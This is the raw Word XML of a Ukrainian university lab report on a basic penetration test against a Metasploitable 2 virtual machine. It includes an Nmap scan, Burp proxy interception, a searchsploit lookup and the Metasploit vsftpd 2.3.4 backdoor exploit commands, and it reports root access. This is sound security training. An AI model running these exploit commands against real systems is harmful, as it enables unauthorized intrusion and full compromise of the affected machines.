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EB11C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bookmarkStart w:id="0" w:name="_Hlk198031345"/>
      <w:bookmarkEnd w:id="0"/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Кам’янець-Подільський національний університет імені Івана Огієнка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD8B71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Кафедра комп’ютерних наук</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B22B9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6F2007A5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3AD22945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2B861E4D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53452878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Навчальна дисципліна </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2E5BC9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t>«Технології захисту інформації»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5083FFD7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72FAC26E" w14:textId="77777777" w:rsidR="006D0D7C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1901E24F" w14:textId="77777777" w:rsidR="006D0D7C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7853BD59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3F93F891" w14:textId="142A9B5E" w:rsidR="006D0D7C" w:rsidRPr="00C27AC6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Лабораторна робота №</w:t>
      </w:r>
      <w:r w:rsidR="00C27A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  <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A874CD9" w14:textId="77777777" w:rsidR="005A1974" w:rsidRPr="005A1974" w:rsidRDefault="005A1974" w:rsidP="005A1974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5A1974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проведення пентесту (Nmap, Metasploit, Burp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC26FA2" w14:textId="43367084" w:rsidR="006D0D7C" w:rsidRPr="00FE65E7" w:rsidRDefault="006D0D7C" w:rsidP="005A1974">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/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t>Викона</w:t>
      </w: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в</w:t>
      </w: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t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21418347" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="00FE65E7" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="righ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студент 4-го курсу </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69560412" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="00FE65E7" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="righ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групи KN1-B22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7191B" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="006D0D7C" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C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</w:pPr>
      <w:r w:rsidRPr="006D0D7C"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t>Демченко Дмитро</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BAF03B" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="00FE65E7" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C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</w:pPr>
    </w:p>
    <w:p w14:paraId="659EF5F3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1E4E687C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410B2487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638533D2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0821E4E5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1756E45C" w14:textId="77777777" w:rsidR="006D0D7C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7FA84DD9" w14:textId="77777777" w:rsidR="00CB33B5" w:rsidRPr="00CB33B5" w:rsidRDefault="00CB33B5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7B83559D" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="006D0D7C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78787113" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="00DD1871" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C">
      <w:pPr>
        <w:spacing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3F96EEA6" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRPr="006D0D7C" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C">
      <w:pPr>
        <w:spacing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1C4E1CD1" w14:textId="77777777" w:rsidR="006D0D7C" w:rsidRDefault="006D0D7C" w:rsidP="006D0D7C">
      <w:pPr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Кам’янець-Подільський – 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB93875" w14:textId="5BD329D7" w:rsidR="002D5349" w:rsidRPr="0083375B" w:rsidRDefault="006D0D7C">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3A972" w14:textId="373766B7" w:rsidR="000407F5" w:rsidRPr="00384FBD" w:rsidRDefault="00C6496D" w:rsidP="000407F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6B6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Pr="004C6B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53105" w:rsidRPr="0075310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384FBD" w:rsidRPr="00384FBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>відпрацювати повний цикл базового пентесту у тестовому середовищі</w:t>
      </w:r>
      <w:r w:rsidR="00384FBD" w:rsidRPr="00384F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5B7224" w14:textId="77777777" w:rsidR="002F6FAE" w:rsidRPr="008523F4" w:rsidRDefault="002F6FAE" w:rsidP="002F6FA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523F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середовища: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4EEE10" w14:textId="38F18064" w:rsidR="00C6496D" w:rsidRPr="00C30B04" w:rsidRDefault="002F6FAE" w:rsidP="00945D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523F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ПЗ для віртуальної машини: VMware® Workstation 17 Pro 17.6.4 build-24832109</w:t>
      </w:r>
      <w:r w:rsidR="00981D7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F4A45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable 2,</w:t>
      </w:r>
      <w:r w:rsidR="00706EB4" w:rsidRPr="00706EB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00706EB4" w:rsidRPr="00706EB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap version 7.95</w:t>
      </w:r>
      <w:r w:rsidR="00706EB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Burp Suit Community Edition v2025.7.4 build 41034</w:t>
      </w:r>
      <w:r w:rsidR="005A2D5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81D7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43882">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfconsole F</w:t>
      </w:r>
      <w:r w:rsidR="00943882" w:rsidRPr="00943882">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ramework Version: 6.4.84-dev</w:t>
      </w:r>
      <w:r w:rsidR="001116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523F4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C00C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23F4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C00C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23F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00CA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8523F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C00CA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r w:rsidRPr="008523F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="0071036D" w:rsidRPr="00A761D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="00981D7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81D7C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981D7C" w:rsidRPr="00194A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4A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable </w:t>
      </w:r>
      <w:r w:rsidR="00981D7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81D7C" w:rsidRPr="00194A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 192.168.135.1</w:t>
      </w:r>
      <w:r w:rsidR="00C30B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1E0E5D" w14:textId="096DC4D1" w:rsidR="00C6496D" w:rsidRPr="004C6B6A" w:rsidRDefault="00C6496D" w:rsidP="000407F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C6B6A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Команди:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D0383A" w14:textId="77777777" w:rsidR="00E111BD" w:rsidRPr="00E111BD" w:rsidRDefault="00360620" w:rsidP="00E111B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C6B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="00E67D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11BD" w:rsidRPr="00E111BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1) Nmap reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724FB9EE" w14:textId="235BB52B" w:rsidR="00030DE4" w:rsidRDefault="00E111BD" w:rsidP="00E11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11BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS -sV -O -A -oN nmap_full.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.135.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC594FB" w14:textId="1696F393" w:rsidR="00E111BD" w:rsidRDefault="00E111BD" w:rsidP="00E111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0B13F0" wp14:editId="2099F9DB">
            <wp:extent cx="6842125" cy="36163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9EAE" w14:textId="77777777" w:rsidR="00E111BD" w:rsidRDefault="00E111BD" w:rsidP="00E111B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0F7539" w14:textId="7DB9889B" w:rsidR="00E111BD" w:rsidRDefault="00E111BD" w:rsidP="00E111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BA9745" wp14:editId="70A691A2">
            <wp:extent cx="6842125" cy="36163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8D86" w14:textId="644C4CD8" w:rsidR="00E111BD" w:rsidRDefault="00E111BD" w:rsidP="00E111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2CF80C" wp14:editId="52E464B4">
            <wp:extent cx="6842125" cy="36163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53A5" w14:textId="77777777" w:rsidR="00E111BD" w:rsidRDefault="00E111BD" w:rsidP="00E111B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1FBAA6" w14:textId="070DADD8" w:rsidR="00E111BD" w:rsidRDefault="00E111BD" w:rsidP="00E111B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D2DB96" wp14:editId="1F1AD487">
            <wp:extent cx="6842125" cy="36163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B24E" w14:textId="0EE1ABBB" w:rsidR="00094512" w:rsidRPr="00094512" w:rsidRDefault="00094512" w:rsidP="00E111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Вразливост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машини на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FD4B1" w14:textId="124788AB" w:rsidR="00ED17BF" w:rsidRDefault="00ED17BF" w:rsidP="00E111B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17BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порт 21 (FTP): vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD49947" w14:textId="526BF2D9" w:rsidR="00ED17BF" w:rsidRDefault="00ED17BF" w:rsidP="00E111B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17BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порт 23 (Telnet): Linux telnetd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BFBF76" w14:textId="74583211" w:rsidR="00E111BD" w:rsidRDefault="00ED17BF" w:rsidP="00E111B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17BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порт 1524 (bindshell): Metasploitable root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCCEFE1" w14:textId="29E8AB53" w:rsidR="00ED17BF" w:rsidRDefault="00ED17BF" w:rsidP="00E111B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D17BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>орт 6667 (IRC): UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BA0F46" w14:textId="3DABDCB0" w:rsidR="00ED17BF" w:rsidRPr="00ED17BF" w:rsidRDefault="00ED17BF" w:rsidP="00E111B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17BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порт 80 (HTTP): Apache httpd 2.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408612E8" w14:textId="157C966B" w:rsidR="002B1318" w:rsidRDefault="001F1E92" w:rsidP="003606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1E92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2) Burp Suite proxy: налаштувати браузер, перехоплювати запити.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA1F27" w14:textId="7D349FFA" w:rsidR="007201E7" w:rsidRDefault="006775EA" w:rsidP="003606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6EA3F7E" wp14:editId="4490532B">
            <wp:extent cx="6842125" cy="36163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C719" w14:textId="5B8B099F" w:rsidR="00B524AB" w:rsidRPr="00B524AB" w:rsidRDefault="00B524AB" w:rsidP="0036062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Налаштував </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52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B52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машині </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali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щоб </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52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перехоплював виходячі пакети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEFB99" w14:textId="5E9A85A2" w:rsidR="00FE63DB" w:rsidRPr="0052756C" w:rsidRDefault="006775EA" w:rsidP="003606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3FAE4E" wp14:editId="0F814CFA">
            <wp:extent cx="6842125" cy="36163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3DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Зайшов на веб-сервер машини </w:t>
      </w:r>
      <w:r w:rsidR="00FE63DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00FE63DB" w:rsidRPr="00FE63DB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="0052756C" w:rsidRPr="0052756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F1F182" w14:textId="55008555" w:rsidR="006775EA" w:rsidRDefault="006775EA" w:rsidP="003606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07EF70" wp14:editId="3DE4F5ED">
            <wp:extent cx="6842125" cy="36163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DB6F" w14:textId="7266A8B6" w:rsidR="00147C6C" w:rsidRPr="00147C6C" w:rsidRDefault="00147C6C" w:rsidP="003606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Перехопив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  <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>пакет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386EDC5" w14:textId="26E42EFE" w:rsidR="006775EA" w:rsidRPr="00A86239" w:rsidRDefault="006775EA" w:rsidP="003606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EB9F5E" wp14:editId="5C402E98">
            <wp:extent cx="6842125" cy="36163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AF86" w14:textId="77777777" w:rsidR="00A86239" w:rsidRPr="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A862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86239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3) Пошук експлойтів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A2A9B" w14:textId="4A80DD41" w:rsidR="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A86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6239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>searchsploit vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE357E" w14:textId="058A4B16" w:rsidR="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A862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6F3B19" wp14:editId="74508DD2">
            <wp:extent cx="6842125" cy="666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88E9" w14:textId="1726E38F" w:rsidR="00F603CF" w:rsidRPr="00F603CF" w:rsidRDefault="00F603CF" w:rsidP="00A862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F49115" wp14:editId="33C562BE">
            <wp:extent cx="6842125" cy="9518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8BD1" w14:textId="2CA097CF" w:rsidR="00A86239" w:rsidRPr="00ED5855" w:rsidRDefault="00A86239" w:rsidP="00A862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86239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4) Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="007F25B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70AB97" w14:textId="5C8D19A4" w:rsidR="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A86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6239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB87B39" w14:textId="3C5C174B" w:rsidR="00A86239" w:rsidRPr="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A862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61D1C" wp14:editId="1D37FBC0">
            <wp:extent cx="6842125" cy="36163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9173" w14:textId="77777777" w:rsidR="00A86239" w:rsidRPr="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A86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6239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FE190" w14:textId="77777777" w:rsidR="00A86239" w:rsidRPr="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A86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6239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set RHOST &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A5C993" w14:textId="169D23A9" w:rsidR="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A86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6239">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2F055" w14:textId="4FA2AC86" w:rsidR="00A86239" w:rsidRPr="00A86239" w:rsidRDefault="00A86239" w:rsidP="00A862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C16A25" wp14:editId="30B328B4">
            <wp:extent cx="6842125" cy="36163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6D31" w14:textId="7E866819" w:rsidR="005F51C8" w:rsidRPr="00894FFB" w:rsidRDefault="00894FFB" w:rsidP="004C6B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Отримали доступ до машини </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidRPr="00894FFB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ru-RU"/>
        </w:rPr>
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidRPr="00894F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ексло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іт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C577A9F" w14:textId="77777777" w:rsidR="00ED5855" w:rsidRPr="00ED5855" w:rsidRDefault="004C6B6A" w:rsidP="00ED585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C6B6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  <w:r w:rsidRPr="0027624A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27624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D5855" w:rsidRPr="00ED5855">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Під час виконання лабораторної роботи було успішно проведено повний цикл базового тестування на проникнення в контрольованому середовищі. Мета роботи, яка полягала у відпрацюванні практичних навичок пентесту, була досягнута.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C877F" w14:textId="1CEA4154" w:rsidR="004C6B6A" w:rsidRPr="00ED5855" w:rsidRDefault="00ED5855" w:rsidP="004C6B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D5855">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">За допомогою інструменту Nmap було проведено детальне сканування цільової системи (192.168.135.129). Сканування виявило низку відкритих портів та сервісів, серед яких особливу увагу привернув FTP-сервер vsftpd 2.3.4 на порту 21/tcp. Ця версія програмного </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5855">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>забезпечення відома наявністю критичної вразливості типу "бекдор".Використовуючи Використовуючи Metasploit Framework, було обрано та налаштовано відповідний експлойт (exploit/unix/ftp/vsftpd_234_backdoor). Атака на вразливий FTP-сервіс пройшла успішно, в результаті чого було отримано віддалений доступ до командної оболонки цільової системи.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D5855">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Аналіз отриманого доступу за допомогою команди whoami підтвердив, що сесію було відкрито з правами суперкористувача (</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5855">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5855">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>). Це свідчить про повну компрометацію системи, що дозволяє атакуючому виконувати будь-які команди.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004C6B6A" w:rsidRPr="00ED5855" w:rsidSect="00890B6C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230C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="828E0B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304AE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78A009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50770"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE662B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091674"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28826E2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2E728B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A78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F979F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EF47F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BC22732"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C160F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04521E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18AE2A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7A0651"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DE0C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341D9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5270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144DF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AF2D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8005C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="108C13D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7D236EE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B9A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6F4F05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73C2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60854">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1920358409">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2064789790">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1214193633">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1251086580">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1352685736">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2013947727">
    <w:abstractNumId w:val="7"/>
